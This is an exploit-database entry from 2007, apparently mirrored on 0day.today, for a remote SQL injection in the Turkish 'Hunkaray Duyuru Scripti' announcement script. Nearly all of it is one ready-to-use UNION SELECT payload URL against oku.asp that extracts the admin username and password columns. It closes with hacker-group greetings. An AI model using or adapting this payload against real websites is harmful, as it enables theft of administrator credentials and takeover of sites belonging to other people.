id: 1458
date: 01/31/2007
title: Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit
author: cl24zy
cves: 

=========================================================
Hunkaray Duyuru Scripti (tr) Remote SQL Injection Exploit
=========================================================



###############################################################
#Hunkaray Duyuru Scripti (tr)  == SQL Injection Vulnerability
#Author : cl24zy - DrEgHoT - TuF4N
###############################################################

#Exploit;
#Admin Nick, Passport;
http://[SITE]/oku.asp?id=-1%20union+all+select+0,kullaniciadi,sifre,3+from+admin

#Greetz: iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################



#  0day.today [2023-03-23]  #